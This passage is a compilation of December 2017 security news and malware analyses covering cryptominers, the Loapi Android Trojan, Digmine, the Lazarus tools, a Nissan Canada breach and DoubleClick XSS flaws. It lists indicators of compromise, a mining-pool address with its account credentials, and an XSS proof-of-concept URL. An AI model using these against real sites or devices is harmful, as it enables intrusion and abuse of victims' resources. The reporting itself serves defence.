This is a classic case – the shortcuts are scattered across the system; when opened by the user, they launch the miner. The package includes the TrayIt! utility that hides the miner’s window from the user by minimizing it to the system tray. This miner doesn’t receive any data from the server, but instead operates using the wallet and pool details that were hardwired into it.

Finances
Among the mining pools used by cybercriminals, we detected some that provided statistics about the wallets and the number of miners. At the time of our analysis, total revenue from all wallets was nearly US$3400.

The t1WSaZQxqBLLtGMKsGT6t9WGHom8LcE8Ng5 wallet

The t1JA25kJrAaUw9xe6TzGiC8BU5pZRhgL4Ho wallet

The t1N7sapDRuYdqzKgPwet8L31Z9Aa96i7hy4 wallet

The 3MR6WuGkuPDqPZgibV6gi4DaC7qMabEFks wallet

Conclusion
This small piece of research once again demonstrates that no one should ignore protection measures and get lulled into a false sense of security, believing cybercriminals are only interested in financial organizations; practice shows that regular users are also targeted. The mining software that we analyzed, albeit incapable of inflicting any damage, can seriously impair your workstation’s performance by hijacking its resources and making it work for somebody else.

Indicators of Compromise
C&C
176.9.42.149

MD5
a9510e8f59a34a17ca47df9f78173291
19cdaf36a4bafd84c9f7b2cfff09ca50
613bd514f42e7cc78d6e0e267fc706d0
ab31d1cbed96114f2ea9797030fb608f
0a571873a125c846861127729fcf41bb
fd8f89a437bcb5490a92dc1609f190d1
dd639dc20f62393827c2067021b7fd50
6b567d817b94f714c0005e183ffb6d47
11e66ac4c9e7e3d0b341bdb51f5f8740
58c7db74c6ce306037f22984dd758362
f38b5a31eee2fd8c97249cefbc5fa19f
f378951994051bf90dc561457c88c69f
fb9c1f949f95caeada09c0fd70fb5416
b017f2836988f93b80f4322dbd488e00
211c6c52527b8c1029d64bb75a9a39d8
57cda2f33fce912f4f5eecbc66a27fa6

URLs
thefinereader[.]ru
abby-finereader[.]ru
thexpadder[.]ru
theteamspeak[.]ru
thecoreldraw[.]ru
the-powerpoint[.]ru
theoutlook[.]ru
picturemanager[.]ru
furmark[.]ru
thedxtory[.]ru
thevisio[.]ru
kmp-pleer[.]ru
theadobepremiere[.]ru
cdburner-xp[.]ru
theopenoffice[.]ru
iobit-uninstaller[.]ru


Jack of all trades
22.12.2017 Kaspersky Android
Nowadays, it’s all too easy to end up with malicious apps on your smartphone, even if you’re using the official Google Play app store. The situation gets even worse when you go somewhere other than the official store – fake applications, limited security checks, and so on. However, the spread of malware targeting Android OS is not limited to unofficial stores – advertising, SMS-spam campaigns and other techniques are also used. Among this array of threats we found a rather interesting sample – Trojan.AndroidOS.Loapi. This Trojan boasts a complicated modular architecture that means it can conduct a variety of malicious activities: mine cryptocurrencies, annoy users with constant ads, launch DDoS attacks from the affected device and much more. We’ve never seen such a ‘jack of all trades’ before.

Distribution and infection
Samples of the Loapi family are distributed via advertising campaigns. Malicious files are downloaded after the user is redirected to the attackers’ malicious web resource. We found more than 20 such resources, whose domains refer to popular antivirus solutions and even a famous porn site. As we can see from the image below, Loapi mainly hides behind the mask of antivirus solutions or adult content apps:

After the installation process is finished, the application tries to obtain device administrator permissions, asking for them in a loop until the user agrees. Trojan.AndroidOS.Loapi also checks if the device is rooted, but never subsequently uses root privileges – no doubt they will be used in some new module in the future.

After acquiring admin privileges, the malicious app either hides its icon in the menu or simulates various antivirus activity, depending on the type of application it masquerades as:

Self-protection
Loapi aggressively fights any attempts to revoke device manager permissions. If the user tries to take away these permissions, the malicious app locks the screen and closes the window with device manager settings, executing the following code:

As well as this fairly standard technique to prevent removal, we also found an interesting feature in the self-protection mechanism. The Trojan is capable of receiving from its C&C server a list of apps that pose a danger. This list is used to monitor the installation and launch of those dangerous apps. If one of the apps is installed or launched, then the Trojan shows a fake message claiming it has detected some malware and, of course, prompts the user to delete it:

This message is shown in a loop, so even if the user rejects the offer, the message will be shown again and again until the user finally agrees and deletes the application.

Layered architecture

Let’s take a look at the Trojan’s architecture in more detail:

At the initial stage, the malicious app loads a file from the “assets” folder, decodes it using Base64 and afterwards decrypts it using XOR operations and the app signature hash as a key. A DEX file with payload, which was retrieved after these operations, is loaded with ClassLoader.
At the second stage, the malicious app sends JSON with information about the device to the central C&C server hxxps://api-profit.com:

A command in the following format is received as a response from the server:

Where “installs” is a list of module IDs that have to be downloaded and launched; “removes” is a list of module IDs that have to be deleted; “domains” is a list of domains to be used as C&C servers; “reservedDomains” is an additional reserved list of domains; “hic” is a flag that shows that the app icon should be hidden from the user; and “dangerousPackages” is a list of apps that must be prevented from launching and installing for self-protection purposes.

At the third stage, the modules are downloaded and initialized. All the malicious functionality is concealed inside them. Let’s take a closer look at the modules we received from the cybercriminals’ server.
Advertisement module

Purpose and functionality: this module is used for the aggressive display of advertisements on the user’s device. It can also be used for secretly boosting ratings. Functionality:

Display video ads and banners
Open specified URL
Create shortcuts on the device
Show notifications
Open pages in popular social networks, including Facebook, Instagram, VK
Download and install other applications
Example of task to show ads received from the server:

While handling this task, the application sends a hidden request with a specific User-Agent and Referrer to the web page hxxps://ronesio.xyz/advert/api/interim, which in turn redirects to a page with the ads.

SMS module
Purpose and functionality: this module is used for different manipulations with text messages. Periodically sends requests to the C&C server to obtain relevant settings and commands. Functionality:

Send inbox SMS messages to attackers’ server
Reply to incoming messages according to specified masks (masks are received from C&C server)
Send SMS messages with specified text to specified number (all information is received from C&C server)
Delete SMS messages from inbox and sent folder according to specified masks (masks are received from C&C server)
Execute requests to URL and run specified Javascript code in the page received as a response (legacy functionality that was later moved to a separate module)
Web crawling module
Purpose and functionality: this module is used for hidden Javascript code execution on web pages with WAP billing in order to subscribe the user to various services. Sometimes mobile operators send a text message asking for confirmation of a subscription. In such cases the Trojan uses SMS module functionality to send a reply with the required text. Also, this module can be used for web page crawling. An example of a web page crawling task received from the server is shown below:

This module together with the advertisement module tried to open about 28,000 unique URLs on one device during our 24-hour experiment.

Proxy module
Purpose and functionality: this module is an implementation of an HTTP proxy server that allows the attackers to send HTTP requests from the victim’s device. This can be used to organize DDoS attacks against specified resources. This module can also change the internet connection type on a device (from mobile traffic to Wi-Fi and vice versa).

Mining Monero
Purpose and functionality: this module uses the Android version of minerd to perform Monero (XMR) cryptocurrency mining. Mining is initiated using the code below:

The code uses the following arguments:

url – mining pool address, “stratum+tcp://xmr.pool.minergate.com:45560”
this.user – username, value randomly selected from the following list: “lukasjeromemi@gmail.com”, “jjopajopaa@gmail.com”, “grishaobskyy@mail.ru”, “kimzheng@yandex.ru”, “hirt.brown@gmx.de”, “swiftjobs@rambler.ru”, “highboot1@mail333.com”, “jahram.abdi@yandex.com”, “goodearglen@inbox.ru”, girlfool@bk.ru
password – constant value, “qwe”
Old ties
During our investigation we found a potential connection between Loapi and Trojan.AndroidOS.Podec. We gathered some evidence to support this theory:

Matching C&C server IP addresses. The current address of the active Loapi C&C server is resolved with DNS to 5.101.40.6 and 5.101.40.7. But if we take a look at the history, we can see other IP addresses to which this URL resolved before:

At first, this URL was resolved to the IP address 91.202.62.38. If we analyze the history of DNS records that resolved to this address, we see the following:

As we can see from the records, in 2015 (when Podec was active), this IP address was resolved from various generated domains, and many of them were used in Podec (for example, obiparujudyritow.biz, in the 0AF37F5F07BBF85AFC9D3502C45B81F2 sample).

Matching unique fields at the initial information collection stage. Both Trojans collect information with similar structure and content and send it in JSON format to the attackers’ server during the initial stage. Both JSON objects have the fields “Param1”, “Param2” and “PseudoId”. We performed a search in our internal ElasticSearch clusters – where we store information about clean and malicious applications – and found these fields were only used in Podec and Loapi.
Similar obfuscation.
Similar ways of detecting SU on a device.
Similar functionality (both can subscribe users to paid services).
None of these arguments can be considered conclusive proof of our theory, but taken together they suggest there’s a high probability that the malicious applications Podec and Loapi were created by the same group of cybercriminals.

Conclusion
Loapi is an interesting representative from the world of malicious Android apps. It’s creators have implemented almost the entire spectrum of techniques for attacking devices: the Trojan can subscribe users to paid services, send SMS messages to any number, generate traffic and make money from showing advertisements, use the computing power of a device to mine cryptocurrencies, as well as perform a variety of actions on the internet on behalf of the user/device. The only thing missing is user espionage, but the modular architecture of this Trojan means it’s possible to add this sort of functionality at any time.

P.S.
As part of our dynamic malware analysis we installed the malicious application on a test device. The images below show what happened to it after two days:

Because of the constant load caused by the mining module and generated traffic, the battery bulged and deformed the phone cover.

C&C
ronesio.xyz (advertisement module)
api-profit.com:5210 (SMS module and mining module)
mnfioew.info (web crawler)
mp-app.info (proxy module)

Domains
List of web resources from which the malicious application was downloaded:

Domain IP
a2017-security.com 91.202.62.45
alert.com–securitynotice.us 104.18.47.240,104.18.46.240
alibabadownload.org 91.202.62.45
antivirus-out.net 91.202.62.45
antivirus360.ru 91.202.62.45,31.31.204.59,95.213.165.247,
194.58.56.226,194.58.56.50
clean-application.com 91.202.62.45
defenderdevicebiz.biz 104.27.178.88,104.27.179.88
fixdevice.biz 104.18.45.199,104.18.44.199
highspeard.eu 91.202.62.45
hoxdownload.eu 91.202.62.45
lilybrook.ru 104.24.113.21,104.24.112.21
nootracks.eu 91.202.62.45
noxrow.eu 91.202.62.45
s4.pornolub.xyz 91.202.62.45
sidsidebottom.com 9.56.163.55,104.27.128.72
titangelx.com 104.27.171.112,104.27.170.112
trust.com-mobilehealth.biz 04.27.157.60,104.27.156.60
trust.com-securitynotice.biz 104.31.68.110,104.31.69.110
violetataylor.ru 104.31.88.236,104.31.89.236


Beware of Cryptocurrency Mining Virus Spreading Through Facebook Messenger
22.12.2017 thehackernews
Social

If you receive a video file (packed in zip archive) sent by someone (or your friends) on your Facebook messenger — just don’t click on it.
Researchers from security firm Trend Micro are warning users of a new cryptocurrency mining bot which is spreading through Facebook Messenger and targeting Google Chrome desktop users to take advantage of the recent surge in cryptocurrency prices.
Dubbed Digmine, the Monero-cryptocurrency mining bot disguises as a non-embedded video file, under the name video_xxxx.zip (as shown in the screenshot), but is actually contains an AutoIt executable script.
Once clicked, the malware infects victim’s computer and downloads its components and related configuration files from a remote command-and-control (C&C) server.
Digimine primarily installs a cryptocurrency miner, i.e. miner.exe—a modified version of an open-source Monero miner known as XMRig—which silently mines the Monero cryptocurrency in the background for hackers using the CPU power of the infected computers.

Besides the cryptocurrency miner, Digimine bot also installs an autostart mechanism and launch Chrome with a malicious extension that allows attackers to access the victims’ Facebook profile and spread the same malware file to their friends' list via Messenger.
Since Chrome extensions can only be installed via official Chrome Web Store, "the attackers bypassed this by launching Chrome (loaded with the malicious extension) via command line."
"The extension will read its own configuration from the C&C server. It can instruct the extension to either proceed with logging in to Facebook or open a fake page that will play a video" Trend Micro researchers say.
"The decoy website that plays the video also serves as part of their C&C structure. This site pretends to be a video streaming site but also holds a lot of the configurations for the malware’s components."
It's noteworthy that users opening the malicious video file through the Messenger app on their mobile devices are not affected.
Since the miner is controlled from a C&C server, the authors behind Digiminer can upgrade their malware to add different functionalities overnight.
Digmine was first spotted infecting users in South Korea and has since spread its activities to Vietnam, Azerbaijan, Ukraine, Philippines, Thailand, and Venezuela. But since Facebook Messenger is used worldwide, there are more chances of the bot being spread globally.
When notified by Researchers, Facebook told it had taken down most of the malware files from the social networking site.
Facebook Spam campaigns are quite common. So users are advised to be vigilant when clicking on links and files provided via the social media site platform.


Nissan Finance Canada Suffers Data Breach — Notifies 1.13 Million Customers
22.12.2017 thehackernews Incindent

It's the last month of this year, but possibly not the last data breach report.
Nissan warns of a possible data breach of personal information on its customers who financed their vehicles through Nissan Canada Finance and INFINITI Financial Services Canada.
Although the company says it does not know precisely how many customers were affected by the data breach, Nissan is contacting all of its roughly 1.13 million current and previous customers.
In a statement released Thursday, Nissan Canada said the company became aware of an "unauthorized access to personal information" of some customers on December 11.
"Nissan Canada Finance recently became aware it was the victim of a data breach that may have involved an unauthorized person(s) gaining access to the personal information of some customers that have financed their vehicles through Nissan Canada Finance and INFINITI Financial Services Canada," the company said.
It's believed that the unknown hacker(s) may have had access to the following information:
Customers' names
Home addresses
Vehicle makes and models
Vehicle identification numbers (VIN)
Credit scores
Loan amounts
Monthly payments
The company says there no indication, at least at this moment, that if the data breach also includes payment information and contactable information like email addresses or phone numbers.
The company offers 12 months of free credit monitoring services through TransUnion to all of its financed customers.
Since the investigation into the data breach incident is still ongoing, it is not clear if the hack also impacts customers outside of Canada and customers who did not obtain financing through NCF.
"We sincerely apologize to the customers whose personal information may have been illegally accessed and for any frustration or inconvenience that this may cause," Nissan Canada president Alain Ballu said. "We are focused on supporting our customers and ensuring the security of our systems."
Nissan Canada has contacted Canadian privacy regulators, law enforcement, and data security experts to help rapidly investigate the matter.


Chinese Hackers Target Servers With Three Types of Malware
22.12.2017 securityweek BigBrothers
An established Chinese crime group uses a large coordinated infrastructure to target servers running database services with three different types of malware, GuardiCore security researchers say.

The group is operating worldwide and has been observed launching multiple attacks over the past several months. Each of the three malware families employed – Hex, Hanako and Taylor – is targeting different SQL servers and has its own goals, scale and target services.

According to GuardiCore, a campaign targeting a single server has started in March of this year and evolved into thousands of attacks per day during summer, hitting numerous MS SQL Server and MySQL services. The compromised machines were used for various activities, including cryptocurrency mining, distributed denial of service (DDoS), and for implanting Remote Access Trojans (RATs).

While most of the compromised machines are located in China, some were observed in Thailand, the U.S., Japan, and other countries. Database services on both Windows and Linux machines are targeted.

The three campaigns launched from this infrastructure differ mostly in target goals: Hex focuses on cryptocurrency miners and RATs; Hanako builds a DDoS botnet; and Taylor installs a keylogger and a backdoor. To date, the security firm has observed hundreds of Hex and Hanako attacks and tens of thousands of Taylor incidents each month.

“From what we’ve seen, the attackers often compromise public and private cloud deployments without chasing any specific domain. This is shown in their frequent scanning of Azure and AWS public IP ranges (which are publicly available) while looking for potential victims,” GuardiCore says.

Compromised machines aren’t used for long

To fly under the radar, the actors use each machine to attack only a small number of IPs. The security researchers discovered that victims are re-purposed to make tracing as difficult as possible: every compromised machine is used for about a month and then rotated out of use.

The infected systems are used for scanning, launching attacks, hosting malware executables and as command and control (C&C) servers. Most of the attacks feature three simple steps: scanning, attacking and initial implant.

The scan machines search for subnets and create ‘hit lists’ of IPs and credentials. The attackers, the researchers say, start from a large set of IP ranges and look for machines running services such as HTTP web servers, MS SQL Server, ElasticSearch, and more.

Based on said ‘hit lists’, the attacker machines attempt to gain an initial foothold on the servers through brute forcing MS SQL and MySQL databases. Next, they execute predefined SQL commands to gain full control of the victim machine, such as creating new users for persistency.

Parts of the campaign, such as the RATs, are hosted on separate file servers, to ensure attacks aren’t dependent on a single server. In addition to this modular approach, the infrastructure features both FTP and HFS (HTTP File Server) servers and is used to deliver additional attack tools after the initial dropper runs.

While the Tylor attacks were observed downloading the files from two domains down@mys2016@info and js@mys2016@info, both registered in March 2017, Hex and Hanako were observed using a unique file server per attack.

Attack flow

After brute forcing their way onto the target servers (an operation possible because many admins don’t harden the database beyond the use of a password), the attackers use xp_cmshell, a variety of stored procedures and OLE automation, to upload their first set of tools.

The droppers employed by the group usually establish persistency by creating a backdoor user and opening the Remote Desktop port. Next, malware is downloaded from a short lived FTP or HTTP server.

Later on, the attackers also stop or disable anti-virus and monitoring applications and attempt to cover tracks by deleting any unnecessary registry, file, and folder entries. The downloaded malware attempts to trick detection by using a fake MFC user interface and abnormally sized binaries containing large quantities of junk data.

Hex and Hanako, the security researchers discovered, use the same MS SQL Server attack flow and download unique attack configuration files. They create an identical scheduled task to run the same unique binary and target the same antivirus products.

Hanako gets its name after the backdoor user added to targeted databases.

Written in C++, Hex (it uses name variations of Hex.exe) can log key strokes and capture the screen and microphone to extract information from the victim machines and can download and execute additional modules.

The malware masquerades as Kugou Player, a popular Chinese music streaming service. Along with comments in Chinese found in the code, targets’ location, and configuration files showing email addresses from popular Chinese providers, this suggests that the actor behind the campaign is of Chinese origin, the researchers say.

Taylor (named after an image of Taylor Swift used to hide the keylogger) has been observed in over 80,000 attack attempts since March. As part of the attack, a backdoor related to the 2016 Mirai botnet is also downloaded onto the compromised servers, the researchers say.

Although it uses the same domain names over time and does not change IP addresses often, Taylor uses a more cautious attack script, where the hackers send most of the queries encoded in hex. They also store references to the servers in HTML pages downloaded during the attack.

“The best way to minimize your exposure to campaigns targeting databases is to control the machines that have access to the database. Routinely review the list of machines that have access to your databases, keep this list to a minimum and pay special attention to machines that are accessible directly from the internet. Every connection attempt from an IP or domain that does not belong to this list should be blocked and investigated,” GuardiCore concludes.

“There isn’t a server out there that is connected to a LAN which isn’t vulnerable to malware. If the LAN is connected to the Internet, bad actors can get in. Since infection is inevitable, it is important to watch for the telltale signs of an infection. Behaviors such as abnormal traffic to another host can be an indicator and this could be in the form of excessive connections (E.g. DDoS), bytes, or other metric. Even light scanning behaviors can be detected. Leveraging flow data for network traffic analytics is one of the best resources for monitoring and malware incident response,” Michael Patterson, CEO of Plixer, told SecurityWeek in an emailed comment.


Lithuania Bans Kaspersky Software as 'Potential' Threat
22.12.2017 securityweek BigBrothers
Lithuania will ban Moscow-based cyber security firm Kaspersky Lab's products from computers managing key energy, finance and transport systems due to security concerns, authorities said Thursday.

The Russian firm's software was banned from US government networks earlier this year amid allegations that it helped Russian intelligence steal top secret information.

"The government... recognised that Kaspersky Lab software is a potential national security threat," the Baltic EU state's defence ministry said in a statement.

The government agencies responsible for "critical infrastructure" must replace the popular anti-virus software in "a short while", it added.

Lithuanian intelligence chief Darius Jauniskis recently said the cyberfirm "was sometimes acting as a toy in the hands of (Russian President Vladimir) Putin's administration".

Kaspersky has repeatedly denied having any inappropriate ties with the Kremlin and said that malware-infected Microsoft Office software and not its own was to blame for the hacking theft of American intelligence materials.

Kaspersky told Russian media on Thursday it was "disappointed" and assured customers they "do not have to worry because they have not been subjected to any violation from our company."

"The Kaspersky laboratory has never helped nor will it ever assist any state in the world to engage in cyber-espionage or to conduct cyber-attacks," the company said. "The Kaspersky laboratory has no political connection or affiliation with any government."

Lithuania, a NATO and EU member of 2.8 million people, has been one of the most vocal critics of Russia, notably after its 2014 annexation of the Crimea peninsula from Ukraine.


Google Warns DoubleClick Customers of XSS Flaws
22.12.2017 securityweek
Vulnerebility
Google has warned DoubleClick customers that some of the files provided by third-party vendors through its advertising platform can introduce cross-site scripting (XSS) vulnerabilities.

The tech giant has shared a list of more than a dozen advertising firms whose files are vulnerable to XSS attacks. The company has advised website owners and administrators to check if the files are present on their server – they are typically hosted in the root domain – and remove them.

“We have disabled these vendors where possible for all DoubleClick for Publishers and DoubleClick Ad Exchange customers. However, any of the mentioned files hosted on your site may still pose a risk and should be taken down. We will notify you as we learn more,” Google said.

Google’s DoubleClick for Publishers (DFP) and DoubleClick Ad Exchange advertising services allow customers to display ads outside an iframe, the inline frame used for embedding content within an HTML page. In order to expand ads outside the iframe, Google and third-party ad firms provide what is called an “iframe buster kit,” which includes several HTML and JavaScript files that need to be hosted on the customer’s domain.

Some of these files contain XSS vulnerabilities that allow attackers to execute arbitrary JavaScript code in the context of a user’s browser by getting the victim to click on a specially crafted link.

The issue was brought to light earlier this week by a researcher who uses the online monikers “Zmx” and “Tr4L.” He is an employee of IDM, a company that specializes in solutions for managing, delivering and monetizing content. The firm uses the problematic iframe buster kit, which led to the discovery of the vulnerabilities.

A proof-of-concept (PoC) provided by Zmx shows how these XSS bugs can be triggered:

https://www.jobisjob.ch/predicta/predicta_bf.html?dm=bgtian.life

Zmx told SecurityWeek that he disclosed his findings via the Full Disclosure mailing list on Tuesday without notifying Google “because he is lazy.” It’s unclear if Google’s alert to customers comes in response to the researcher’s post or if it learned about the flaws from other sources. We have reached out to Google for clarifications and will update this article if the company responds.

Zmx also pointed out that there are several other problematic iframe buster kits for expandable ads that may not be provided by Google. The vulnerable kits identified by the researcher and not included in Google’s list come from Undertone, Interpolls and IgnitionOne (netmng.com).

UPDATE. Google has provided the following statement to SecurityWeek:

"We have disabled these vendors, removed these files, and added instructions in our help center to help publishers manage any additional steps to help ensure their users are secure."


North Korean Hackers Targeting Individuals: Report
22.12.2017 securityweek BigBrothers

North Korea Bitten by Bitcoin Bug
North Korean state-sponsored hacking group Lazarus has started targeting individuals and organizations directly, instead of focusing exclusively on spying on financial institutions, Proofpoint reports.

Active since at least 2009, the Lazarus Group is considered one of the most disruptive nation-state sponsored actors, accused of being involved in numerous high-profile attacks. Some of these include the 2014 Sony Pictures hack, last year’s theft of $81 million from the Bangladesh Bank, and this year’s WannaCry ransomware attack.

The group was recently observed to be increasingly focused on financially motivated attacks and was named as the most serious threat against banks earlier this year. More recently, the group also started showing high interest in the skyrocketing prices of cryptocurrencies.

The multistage attacks that Proofpoint has uncovered rely on cryptocurrency-related lures to spread sophisticated backdoors and reconnaissance malware. In some cases, the hackers deploy additional malware, including the Gh0st remote access Trojan (RAT), in an attempt to steal credentials for cryptocurrency wallets and exchanges.

What’s more, Proofpoint's security researchers discovered that the nation-state actor also started targeting a point-of-sale (PoS) related framework to steal credit card data. These PoS attacks can potentially incur high financial losses given their timing near the holiday shopping season.

In a new report (PDF), Proofpoint details a new toolset associated with the Lazarus Group. Dubbed PowerRatankba, the toolset has been targeting individuals, companies, and organizations with interests in cryptocurrency via spear-phishing and phishing campaigns.

The hackers were observed using a total of six different attack vectors to deliver PowerRatankba, including a new Windows executable downloader called PowerSpritz, a malicious Windows Shortcut (LNK) file, malicious Compiled HTML Help (CHM) files, JavaScript (JS) downloaders, two macro-based Microsoft Office documents, and backdoored popular cryptocurrency applications hosted on internationalized domain (IDN) infrastructure, thus appearing as legitimate.

The campaigns started on or around June 30, 2017 and included highly targeted spear-phishing attacks focused on at least one executive at a cryptocurrency organization. While a PowerRatankba.A variant was used in these attacks, the rest of the campaigns used PowerRatankba.B, Proofpoint says.

Attack vectors

The PowerSpritz downloader hides both its legitimate payload and malicious PowerShell command using the Spritz encryption algorithm. The downloader has been delivered via spear-phishing attacks using the TinyCC link shortener service to hide the malicious link.

Posing as Telegram or Skype updates, PowerSpritz would first launch a legitimate installer to trick the user into believing they downloaded a working application installer or update. In the background, however, a PowerShell command is executed to download the first stage of PowerRatankba.

A malicious LNK file was observed using a known AppLocker bypass to retrieve the payload from a TinyURL shortener link. The CHM files abuse a well-known technique to create a shortcut object capable of executing malicious code and to cause the object to be automatically clicked.

The JavaScript (JS) downloaders are hosted on supposedly attacker-controlled servers and have been designed to retrieve decoy PDF documents featuring themes such as cryptocurrency exchanges Coinbase and Bithumb, the Falcon Coin ICO, and a list of Bitcoin transactions.

The researchers also associated two VBScript macro-laden Microsoft Office documents with this activity, namely one Word document and one Excel spreadsheet. The former uses an Internal Revenue Service (IRS) theme, while the latter uses a Bithumb lure.

New first-stage implant

Recent attacks involved the use of phishing emails to direct users to fake webpages in an attempt to trick them into downloading or updating cryptocurrency applications. A backdoor in the PyInstaller executables, however, was meant to download PowerRatankba.

The implant, supposedly a successor of Ratankba, which was publicly detailed earlier this year, is a first stage reconnaissance tool used for the deployment of further stage implants. Using HTTP for command and control (C&C) communication, PowerRatankba first sends information about the machine, including computer name, IP address, OS boot time and installation date, language, info on ports 139/3389/445, a process list, and output from two WMIC commands (PowerRatankba.B only).

After initial contact with the C&C, PowerRatankba.A sends a request to receive commands from the server. This malware variant can download a payload and execute it via memory injection; can download the payload, save it to disk, and then execute it; can sleep and send request after sleep; and exit.

For persistence, PowerRatankba.A saves a JS file to the Startup folder. Depending on whether it runs under an admin account or not, PowerRatankba.B either downloads a PowerShell script, saves it to disk, and creates a scheduled task to execute it on system startup, or downloads a VBScript file and saves it to the Startup folder.

PowerRatankba.B was observed delivering a custom variant of the Gh0st RAT to several devices, but only to victims with obvious interest in cryptocurrencies. An attack involving the RAT revealed immediate interest in taking full remote control of the infected device to interact with a password-protected Bitcoin wallet, among other applications.

POS malware

The North Korean state-sponsored hackers appear to be interested in other financially motivated actions as well, beyond stealing millions in cryptocurrency. Thus, Proofpoint has discovered what appears to be a Lazarus operation focused on targeting PoS terminals of businesses operating in South Korea.

Dubbed RatankbaPOS, this might be “the first publicly documented nation-state sponsored campaign to steal PoS data from a PoS-related framework,” the security researchers note.

Although it’s unclear how the new malware variant is distributed, Proofpoint believes that PowerRatankba is used to deploy later stage implants that would ultimately infect systems with RatankbaPOS. The file was found on a C&C in plaintext, suggesting that it wasn’t deployed using the reconnaissance tool.

Deployment is achieved through a process injection dropper that can also achieve persistence by creating a registry key. The malware first checks with the server for an update and then starts the process injection search.

RatankbaPOS would hook a KSNETADSL.dll module “which appears to be the handling of encrypted and decrypted credit card numbers for a KSNET-related POS framework system.” According to Proofpoint, however, the module (two of them, actually) isn’t the correct target for the malware.

The security researchers believe that the malware might be targeting an encrypted form of the track data, suggesting that the actor is focused on a SoftCamp POS-related software application, framework, or device. The researchers believe “with high confidence” that the attacks are primarily targeting devices in South Korea.

Attribution

“Attribution is a controversial topic and arguably one of the most difficult tasks threat intelligence analysts face. However, based on our research, we assess with a high level of confidence given the information available to us that the operations and activity discussed in this research are attributed to Lazarus Group and ultimately North Korea,” Proofpoint says.

The security firm notes that the use of a specific implementation of the Spritz encryption cipher to encrypt PowerSpritz’ legitimate installer payload and malicious PowerShell commands is one clear indicator that this hacking group is behind the attacks. Furthermore, obfuscation techniques used in these campaigns overlap with those attributed to the Lazarus Group before.

The fact that PowerRatankba and RatankbaPOS include similar or identical features previously observed in the original Ratankba implants are another indicator of correct attribution, the researchers say. To that, the researchers add the use of a common directory for storing implants and logs, seen across the group’s toolset, as well as the initial POST request to C&C to deliver system information.

The researchers also discovered instances of code overlap between the RatankbaPOS dropper and the spreader implant used in the attack on the Far Eastern International Bank (FEIB) in Taiwan in October. The implants use the same directory and set up persistence in almost precisely the same way.

Additionally, Proofpoint discovered that content found in a PowerRatankba JS downloader decoy PDF file was previously used in Lazarus campaigns focused on espionage rather than for financial gain.

According to the security researchers, the detailed campaigns and tools belong to a financially motivated arm of the state actor, which should be differentiated from the espionage and disruption teams. The group is following the money, stealing directly from individuals and organizations instead of targeting financial institutions for espionage, as “traditional” threat actors do.

“This group now appears to be targeting individuals rather than just organizations: individuals are softer targets, often lacking resources and knowledge to defend themselves and providing new avenues of monetization for a state-sponsored threat actor’s toolkit,” Proofpoint concludes.


Nissan Canada Informs 1.1 Million Customers of Data Breach
22.12.2017 securityweek Incindent
Nissan Canada revealed on Thursday that the personal information of some customers may have been compromised as a result of a data breach discovered by the company on December 11.

The incident affects individuals who have financed their vehicles through Nissan Canada Finance (NCF) and INFINITI Financial Services Canada. The exact number of impacted customers has yet to be determined, but Nissan is notifying all 1.13 million current and past customers.

While the company believes not all customers are affected, it has decided to offer all of them free credit monitoring services through TransUnion for a period of 12 months. NCF is in the process of sending out emails and letters to individuals whose information may have been compromised.

The attacker could have stolen names, addresses, vehicle details, vehicle identification numbers (VINs), credit scores, loan amounts, and information on monthly payments. Nissan Canada says the incident does not appear to involve payment card information.

There is no indication that Nissan or Infiniti customers in Canada who did not obtain financing through NCF or customers outside of Canada are impacted.

The company is working with law enforcement and data security experts to investigate the incident and has not made any comments on who might be behind the attack. Canadian privacy regulators have also been informed of the breach.

This is not the first time Nissan has been targeted by hackers. Back in 2012, the company reported finding malware on its global information systems network. Last year, the company was forced to shut down its global websites due to a cyberattack apparently motivated by anger over Japan's controversial whale and dolphin hunts.


Schneider Electric Patches Flaws in Pelco Video Management System
22.12.2017 securityweek ICS
Schneider Electric recently developed a firmware update for its Pelco VideoXpert Enterprise product to address several vulnerabilities, including a high severity code execution flaw.

Pelco VideoXpert Enterprise is a video management system used in commercial facilities worldwide. Researcher Gjoko Krstic discovered that the product is affected by two directory traversal bugs and an improper access control issue that can allow arbitrary code execution.

The most serious of the flaws is CVE-2017-9966, which allows an attacker to replace certain files and execute malicious code with system privileges, Schneider Electric and ICS-CERT said in their advisories.Schneider fixes vulnerabilities in Pelco video management system

Schneider fixes vulnerabilities in Pelco video management system

The directory traversal vulnerabilities are tracked as CVE-2017-9964 and CVE-2017-9965, and they have been classified as medium severity. The first security hole allows an attacker to bypass authentication or hijack sessions by “sniffing communications.”

The second directory traversal can be exploited by an unauthorized user to access web server files that could contain sensitive information.

These Pelco VideoXpert Enterprise vulnerabilities have been patched with the release of firmware version 2.1. All prior versions are affected.

This is the third round of Pelco product vulnerabilities covered in advisories published by ICS-CERT. The organization also released an advisory in June 2016 for a serious vulnerability in the Digital Sentry video management system, and in March 2015 for a high severity flaw in the DS-NVs software package.


Intelligence Committee Outlines UK's Offensive and Defensive Cyber Posture
22.12.2017 securityweek BigBrothers
The UK Intelligence and Security Committee, which has oversight of the UK intelligence community, published its 2016-2017 annual report (PDF) on Wednesday. With the rider that the report was written prior to April 2017, but delayed in publication, it provides insight into the UK perspective on global cyber threats. Its discussion includes commentary on nation state adversaries, the potential impact of the Trump administration on UKUSA, and the effect of Brexit on GCHQ operations.

The primary cyber threats are perceived to come from state actors, organized criminals and terrorist groups. State actors are the most advanced, with objectives including traditional espionage, commercial secrets and geopolitical instability. Organized crime occupies the next level of sophistication, becoming increasingly competent and targeted, and concentrating on financial gain. Terrorist groups have the intent to use cyber techniques, but are currently thought to lack the requisite capabilities (although this is likely to change).

There is additional threat from hacktivists and less competent criminals. Hacktivists are often politically motivated and primarily use DDoS for publicity or to inflict reputational damage. The entry level for less-skilled criminals is lowering, and financial gain is the main motivation.

The impact from cyber threats is primarily economic, although the reports notes, "increasingly there is a risk of physical damage in the 'real world'." This is magnified by the growing insecure internet of things (IoT) usage within the critical infrastructure. "Manufacturers," says the report, "are likely to side-line cyber security considerations, given their potential impact on time to market and, therefore, profits." The Committee urges the government to work with industry internationally "to promote the use of modern and secure operating systems in all smart devices connected to the internet."

The report describes the UK's new (since November 2016) National Cyber Security Strategy. It revolves around 'Defend' (which is typical cyber security mitigation); 'Deter' (which includes the specific warning, "We have the means to take offensive action in cyberspace, should we choose to do so"); and 'Develop' (based on "an innovative, growing cyber security industry").

GCHQ is tasked with implementing this policy; and it is leading to a change in GCHQ's traditional posture -- it is coming out of the shadows and promises to be more proactive in UK commercial cyber defense.

